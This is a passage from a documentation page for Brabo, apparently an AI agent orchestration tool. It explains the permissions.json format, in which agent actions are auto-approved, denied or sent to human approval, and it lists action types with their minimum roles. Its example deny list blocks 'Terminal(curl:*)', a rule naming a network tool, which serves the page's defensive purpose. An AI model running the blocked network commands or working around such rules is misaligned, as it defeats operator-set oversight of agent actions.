<!doctype html><html lang=pt-BR dir=ltr class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-reference/permissions" data-has-hydrated=false><head><meta charset=UTF-8><meta name=generator content="Docusaurus v3.10.2"><title data-rh=true>Permissions | Brabo</title><meta data-rh=true name=viewport content="width=device-width, initial-scale=1.0"/><meta data-rh=true name=robots content="noindex, nofollow"/><meta data-rh=true name=twitter:card content=summary_large_image /><meta data-rh=true property=og:url content=https://daneiel.github.io/brabo/dev/pt-BR/reference/permissions /><meta data-rh=true property=og:locale content=pt_BR /><meta data-rh=true property=og:locale:alternate content=en /><meta data-rh=true name=docusaurus_locale content=pt-BR /><meta data-rh=true name=docsearch:language content=pt-BR /><meta data-rh=true name=docusaurus_version content=current /><meta data-rh=true name=docusaurus_tag content=docs-default-current /><meta data-rh=true name=docsearch:version content=current /><meta data-rh=true name=docsearch:docusaurus_tag content=docs-default-current /><meta data-rh=true property=og:title content="Permissions | Brabo"/><meta data-rh=true name=description content="The format of permissions.json, how a pattern matches a command, and the exact order in which the decision is made."/><meta data-rh=true property=og:description content="The format of permissions.json, how a pattern matches a command, and the exact order in which the decision is made."/><meta data-rh=true name=keywords content=permissions.json,approval,policy,deny,allow,proposed_action /><link data-rh=true rel=icon href=/brabo/dev/pt-BR/img/favicon.ico /><link data-rh=true rel=canonical href=https://daneiel.github.io/brabo/dev/pt-BR/reference/permissions /><link data-rh=true rel=alternate href=https://daneiel.github.io/brabo/dev/reference/permissions hreflang=en /><link data-rh=true rel=alternate href=https://daneiel.github.io/brabo/dev/pt-BR/reference/permissions hreflang=pt-BR /><link data-rh=true rel=alternate href=https://daneiel.github.io/brabo/dev/reference/permissions hreflang=x-default /><script data-rh=true type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","item":"https://daneiel.github.io/brabo/dev/pt-BR/reference/permissions","name":"Permissions","position":1}]}</script><link rel=stylesheet href=/brabo/dev/pt-BR/assets/css/styles.4b02629e.css /><script src=/brabo/dev/pt-BR/assets/js/runtime~main.116b5e1c.js defer></script><script src=/brabo/dev/pt-BR/assets/js/main.da533543.js defer></script></head><body><svg style="display: none;"><defs>
<symbol id=theme-svg-external-link viewBox="0 0 24 24"><path fill=currentColor d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme-abb")}catch(t){}}();document.documentElement.setAttribute("data-theme",t||(window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light")),document.documentElement.setAttribute("data-theme-choice",t||"system")}(),function(){try{for(var[t,e]of new URLSearchParams(window.location.search).entries())if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id=__docusaurus><link rel=preload as=image href=/brabo/dev/pt-BR/img/logo.svg /><div role=region aria-label="Pular para o conteúdo principal"><a class=skipToContent_CFOX href=#__docusaurus_skipToContent_fallback>Pular para o conteúdo principal</a></div><nav aria-label="Navegação principal" class="theme-layout-navbar navbar navbar--fixed-top"><div class=navbar__inner><div class="theme-layout-navbar-left navbar__items"><button aria-label="Alternar painel de navegação" aria-expanded=false class="navbar__toggle clean-btn" type=button><svg width=30 height=30 viewBox="0 0 30 30" aria-hidden=true><path stroke=currentColor stroke-linecap=round stroke-miterlimit=10 stroke-width=2 d="M4 7h22M4 15h22M4 23h22"/></svg></button><a class=navbar__brand href=/brabo/dev/pt-BR/><div class=navbar__logo><img src=/brabo/dev/pt-BR/img/logo.svg alt=Brabo class="themedComponent_Eyrh themedComponent--light_vzqw"/><img src=/brabo/dev/pt-BR/img/logo.svg alt=Brabo class="themedComponent_Eyrh themedComponent--dark_FhTf"/></div><b class="navbar__title text--truncate">Brabo</b></a><a aria-current=page class="navbar__item navbar__link navbar__link--active" href=/brabo/dev/pt-BR/>Documentação</a><a class="navbar__item navbar__link" href=/brabo/dev/pt-BR/runbook>Runbook</a><a class="navbar__item navbar__link" href=/brabo/dev/pt-BR/adr>ADRs</a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href=# aria-haspopup=true aria-expanded=false role=button class=navbar__link>dev</a><ul class=dropdown__menu><li><a href=https://daneiel.github.io/brabo/prd/ target=_blank rel="noopener noreferrer" class=dropdown__link>prd — estável<svg width=12 height=12 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li><a href=https://daneiel.github.io/brabo/qa/ target=_blank rel="noopener noreferrer" class=dropdown__link>qa — candidata<svg width=12 height=12 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li><a href=https://daneiel.github.io/brabo/dev/ target=_blank rel="noopener noreferrer" class=dropdown__link>dev — em desenvolvimento ✓<svg width=12 height=12 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a></ul></div><a href=https://github.com/daneiel/brabo target=_blank rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><div class="toggle_pnX7 colorModeToggle_Dj3Z"><button class="clean-btn toggleButton_DKER toggleButtonDisabled_qzkp" type=button disabled title="modo do sistema" aria-label="Mudar entre modo claro e escuro (modo do sistema está ativo)"><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_MMQL lightToggleIcon_E8tM"><path fill=currentColor d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"/></svg><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_MMQL darkToggleIcon_rXjT"><path fill=currentColor d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"/></svg><svg viewBox="0 0 24 24" width=24 height=24 aria-hidden=true class="toggleIcon_MMQL systemToggleIcon_zwCm"><path fill=currentColor d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"/></svg></button></div><div class=navbarSearchContainer_zRAa><div class="navbar__search searchBarContainer_eGzj" dir=ltr><svg aria-hidden=true class=searchIcon_PXpx focusable=false viewBox="0 0 16 16"><path fill=currentColor d="M6.02945 10.20327a4.17382 4.17382 0 1 1 4.17382-4.17382 4.15609 4.15609 0 0 1-4.17382 4.17382Zm9.69195 4.2199-4.8225-4.82338A5.88021 5.88021 0 0 0 12.058 6.02856 6.00467 6.00467 0 1 0 9.59979 10.8989l4.82338 4.82338a.89729.89729 0 0 0 1.29912 0 .89749.89749 0 0 0-.00087-1.29909Z"/></svg><input placeholder=Search aria-label=Search class="navbar__search-input searchInput_xOBI" value="" /><div class="loadingRing_JccP searchBarLoadingRing_aTss"><div></div><div></div><div></div><div></div></div></div></div></div></div><div role=presentation class=navbar-sidebar__backdrop></div></nav><div id=__docusaurus_skipToContent_fallback class="theme-layout-main main-wrapper mainWrapper_WJkx"><div class=docsWrapper_mIeg><button aria-label="Voltar para o topo" class="clean-btn theme-back-to-top-button backToTopButton_Afc8" type=button></button><div class=docRoot_XZYc><aside class="theme-doc-sidebar-container docSidebarContainer_FPqZ"><div class=sidebarViewport_waOe><div class=sidebar_RQC4><nav aria-label="Painel lateral de documentos" class="menu thin-scrollbar menu_ZM4U"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/><span class=categoryLinkLabel_jKch>🚀 Comece aqui</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/><span class=linkLabel_CzBh>Introdução</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/getting-started><span class=linkLabel_CzBh>Primeiros passos</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/architecture><span class=categoryLinkLabel_jKch>🏗️ Arquitetura</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/architecture><span class=linkLabel_CzBh>Arquitetura</span></a><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist" tabindex=0 href=/brabo/dev/pt-BR/adr><span class=categoryLinkLabel_jKch>Decisões (ADR)</span></a><button aria-label="Expandir a categoria 'Decisões (ADR)'" aria-expanded=false type=button class="clean-btn menu__caret"></button></div></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/business-rules><span class=categoryLinkLabel_jKch>📐 Regras</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/business-rules><span class=linkLabel_CzBh>Regras de negócio</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/business-rules/custo><span class=linkLabel_CzBh>Custo e metering</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/business-rules/autenticacao><span class=linkLabel_CzBh>Autenticação</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret menu__link--active" role=button aria-expanded=true href=/brabo/dev/pt-BR/reference/configuration><span class=categoryLinkLabel_jKch>📖 Referência</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/configuration><span class=linkLabel_CzBh>Configuration</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/events><span class=linkLabel_CzBh>Events</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link menu__link--active" aria-current=page tabindex=0 href=/brabo/dev/pt-BR/reference/permissions><span class=linkLabel_CzBh>Permissions</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/artifacts><span class=linkLabel_CzBh>Artifacts</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/git-providers><span class=linkLabel_CzBh>Git Providers</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/internal-api><span class=linkLabel_CzBh>Internal API</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/scripts><span class=linkLabel_CzBh>Scripts</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/reference/rulesets><span class=linkLabel_CzBh>Rulesets</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/security-surface><span class=linkLabel_CzBh>Superfície exposta da api</span></a><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=false tabindex=0 href=/brabo/dev/pt-BR/reference/api/brabo-api><span class=categoryLinkLabel_jKch>Referência da API</span></a></div></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/explanation/documentation-workflow><span class=categoryLinkLabel_jKch>💡 Explicação</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/documentation-workflow><span class=linkLabel_CzBh>Sincronização de docs</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/branching-policy><span class=linkLabel_CzBh>Política de branches</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/cadeia-de-suprimentos-do-ci><span class=linkLabel_CzBh>Cadeia de suprimentos do CI</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/observability><span class=linkLabel_CzBh>Observabilidade</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/primeiro-dogfooding><span class=linkLabel_CzBh>Primeiro dogfooding</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/execucao-real-hello-world><span class=linkLabel_CzBh>Execução real (hello world)</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/achados-execucao-real><span class=linkLabel_CzBh>Achados da execução real da esteira</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/backlog><span class=linkLabel_CzBh>Backlog triado</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/validacao-fase-12><span class=linkLabel_CzBh>Validação da Fase 12</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/validacao-real><span class=linkLabel_CzBh>Validação real (13b)</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/aceite-providers><span class=linkLabel_CzBh>Aceite dos providers</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/gates><span class=linkLabel_CzBh>Os gates, e como eles são medidos</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/auditoria-fluxo-vs-codigo><span class=linkLabel_CzBh>Auditoria: fluxo.yml × código (v3, ADR 0085)</span></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/explanation/historico-de-fases><span class=linkLabel_CzBh>Histórico de fases</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/runbook><span class=categoryLinkLabel_jKch>🛠️ Operação</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/runbook><span class=linkLabel_CzBh>Runbook</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true href=/brabo/dev/pt-BR/glossary><span class=categoryLinkLabel_jKch>📚 Vocabulário</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class=menu__link tabindex=0 href=/brabo/dev/pt-BR/glossary><span class=linkLabel_CzBh>Glossário</span></a></ul><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class=menu__list-item-collapsible><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class="categoryLink_akZY menu__link menu__link--sublist menu__link--sublist-caret" role=button aria-expanded=true><span class=categoryLinkLabel_jKch>🤝 Contribuir</span></a></div><ul class=menu__list><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/CONTRIBUTING.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_Ca3u" tabindex=0><span class=linkLabel_CzBh>Como contribuir</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/SUPPORT.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_Ca3u" tabindex=0><span class=linkLabel_CzBh>Onde pedir ajuda</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a href=https://github.com/daneiel/brabo/blob/dev/SECURITY.md target=_blank rel="noopener noreferrer" class="menu__link menuExternalLink_Ca3u" tabindex=0><span class=linkLabel_CzBh>Reportar vulnerabilidade</span><svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a></ul></ul></nav></div></div></aside><main class=docMainContainer_ia8v><div class="container padding-top--md padding-bottom--lg"><div class=row><div class="col docItemCol_JmCf"><div class=docItemContainer_GUvW><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_sZul" aria-label=Trilha><ul class=breadcrumbs><li class=breadcrumbs__item><a aria-label="Página Inicial" class=breadcrumbs__link href=/brabo/dev/pt-BR/><svg viewBox="0 0 24 24" class=breadcrumbHomeIcon_AUjL><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill=currentColor /></svg></a><li class=breadcrumbs__item><span class=breadcrumbs__link>📖 Referência</span><li class="breadcrumbs__item breadcrumbs__item--active"><span class=breadcrumbs__link>Permissions</span></ul></nav><div class="tocCollapsible_nbAK theme-doc-toc-mobile tocMobile_r92C"><button type=button class="clean-btn tocCollapsibleButton_hcyq">Nesta página</button></div><div class="theme-doc-markdown markdown"><div class=row><div class="col col--12 markdown"><header><h1>Permissions</h1></header>
<p>Every action with an external effect is born as a <code>proposed_action</code> and goes
through here before executing. This page is the exact format and semantics —
the rules themselves are in <a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-004 target=_blank rel="noopener noreferrer" class="">Business rules</a>.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=the-file>The file<a href=#the-file class=hash-link aria-label="Link direto para The file" title="Link direto para The file" translate=no>​</a></h2>
<p><code>permissions.json</code> lives at the <strong>root of the project workspace</strong> — it's a
real file on disk, versionable, not a column in the database.</p>
<div class="language-json codeBlockContainer_Vzt9 theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_FxwE><pre tabindex=0 class="prism-code language-json codeBlock_mqej thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_uNqR><div class=token-line style=color:#F8F8F2><span class="token punctuation" style="color:rgb(248, 248, 242)">{</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"allow"</span><span class="token operator">:</span><span class="token plain"> </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(pnpm test:*)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"> </span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(git status)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"deny"</span><span class="token operator">:</span><span class="token plain">  </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"Terminal(curl:*)"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token punctuation" style="color:rgb(248, 248, 242)">,</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain">  </span><span class="token property">"ask"</span><span class="token operator">:</span><span class="token plain">   </span><span class="token punctuation" style="color:rgb(248, 248, 242)">[</span><span class="token string" style="color:rgb(255, 121, 198)">"GitPush()"</span><span class="token punctuation" style="color:rgb(248, 248, 242)">]</span><span class="token plain"></span><br/></div><div class=token-line style=color:#F8F8F2><span class="token plain"></span><span class="token punctuation" style="color:rgb(248, 248, 242)">}</span><br/></div></code></pre></div></div>
<p>Three lists, three meanings:</p>





















<table><thead><tr><th>list<th>meaning<tbody><tr><td><code>allow</code><td><code>auto_approve</code> — the action executes without asking<tr><td><code>deny</code><td><code>deny</code> — refused, and nothing reverts this<tr><td><code>ask</code><td><code>require_approval</code> — goes to the approval queue</table>
<p>No list matches? The action stays <code>pending</code> by default. <strong>The absence of a
rule never becomes a permission.</strong></p>
<h3 class="anchor anchorTargetStickyNavbar_PEh0" id=with-which-credential-the-auto-approved-action-executes>With which credential the auto-approved action executes<a href=#with-which-credential-the-auto-approved-action-executes class=hash-link aria-label="Link direto para With which credential the auto-approved action executes" title="Link direto para With which credential the auto-approved action executes" translate=no>​</a></h3>
<p><code>auto_approve</code> means <strong>nobody decided</strong> — <code>proposed_actions.decided_by</code>
stays <code>NULL</code>. This matters for who executes: a git action against a remote
provider needs a token, and "the token of whoever decided" doesn't exist on
this path.</p>
<p>The answer is the <strong>workspace owner</strong> (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-082 target=_blank rel="noopener noreferrer" class="">RN-082</a>),
the same one as the LLM key (<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-058 target=_blank rel="noopener noreferrer" class="">RN-058</a>) —
whoever funds the account funds the agents, and that doesn't change based on
who clicks.</p>
<p>It's worth knowing because the alternative fails silently: while the api
resolved by <code>decided_by</code>, <strong>every auto-approved PR on a remote repository
died</strong> with <code>Requires authentication</code>, and only when a human clicked each
one did the path work — exactly the ladder that autonomy exists to avoid.</p>
<h2 class="anchor anchorTargetStickyNavbar_PEh0" id=the-pattern-format>The pattern format<a href=#the-pattern-format class=hash-link aria-label="Link direto para The pattern format" title="Link direto para The pattern format" translate=no>​</a></h2>
<div class="language-text codeBlockContainer_Vzt9 theme-code-block" style=--prism-color:#F8F8F2;--prism-background-color:#282A36><div class=codeBlockContent_FxwE><pre tabindex=0 class="prism-code language-text codeBlock_mqej thin-scrollbar" style=color:#F8F8F2;background-color:#282A36><code class=codeBlockLines_uNqR><div class=token-line style=color:#F8F8F2><span class="token plain">Label(content)</span><br/></div></code></pre></div></div>
<p>The label is the action type in PascalCase. The content is only used for
<code>Terminal</code>; in the other types it needs to be <strong>empty</strong> — <code>GitPush()</code>
matches any push, and <code>GitPush(algo)</code> matches nothing.</p>































































































<table><thead><tr><th>action type<th>label<th>minimum role<tbody><tr><td><code>terminal</code><td><code>Terminal</code><td>developer<tr><td><code>git_commit</code><td><code>GitCommit</code><td>developer<tr><td><code>write_file</code><td><code>WriteFile</code><td>developer<tr><td><code>git_push</code><td><code>GitPush</code><td>maintainer<tr><td><code>pr_open</code><td><code>PrOpen</code><td>maintainer<tr><td><code>git_repo_create</code><td><code>GitRepoCreate</code><td>maintainer<tr><td><code>git_branch_create</code><td><code>GitBranchCreate</code><td>maintainer<tr><td><code>git_branch_protect</code><td><code>GitBranchProtect</code><td>maintainer<tr><td><code>open_adr_pr</code><td><code>OpenAdrPr</code><td>maintainer<tr><td><code>open_infra_pr</code><td><code>OpenInfraPr</code><td>maintainer<tr><td><code>git_merge</code><td><code>GitMerge</code><td>maintainer<tr><td><code>instruction_patch</code><td><code>InstructionPatch</code><td>maintainer<tr><td><code>parallelize</code><td><code>Parallelize</code><td>maintainer<tr><td><code>raise_max_parallel</code><td><code>RaiseMaxParallel</code><td>maintainer<tr><td><code>propose_execution_plan</code><td><code>ProposeExecutionPlan</code><td>maintainer<tr><td><code>assess_implementability</code><td><code>AssessImplementability</code><td>maintainer<tr><td><code>spend</code><td><code>Spend</code><td><strong>owner</strong></table>
<p>The minimum role is checked <strong>before</strong> the file. Without it, <code>deny</code> —
<code>permissions.json</code> cannot grant what IAM denies</p>
<p><code>parallelize</code> (Phase 14d) is the only one whose effect isn't touching code
or repository: it requests more AGENTS. It's at <code>maintainer</code> for the same
reason as <code>spend</code> — whoever authorizes cost is whoever is accountable for
the project. It only exists above the lead's cap; within it there's no
action, because there's nothing to decide
(<a href=/brabo/dev/pt-BR/pt-BR/business-rules/custo#rn-083 target=_blank rel="noopener noreferrer" class="">RN-083</a>)
(<a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-005 target=_blank rel="noopener noreferrer" class="">RN-005</a>).</p>
<p><code>propose_execution_plan</code> (ADR 0086, <a href=/brabo/dev/pt-BR/pt-BR/business-rules#rn-284 target=_blank rel="noopener noreferrer" class="">RN-284</a>)
is the Dev Lead's plan — how many agents per module and why, before any of
them come up. Same caliber as <code>parallelize</code>: a decision about HOW MUCH the
product will spend on parallelism, just at the start instead of at a cap
overrun. Unlike <code>parallelize</code>/<code>raise_max_parallel</code>, it is NOT in the
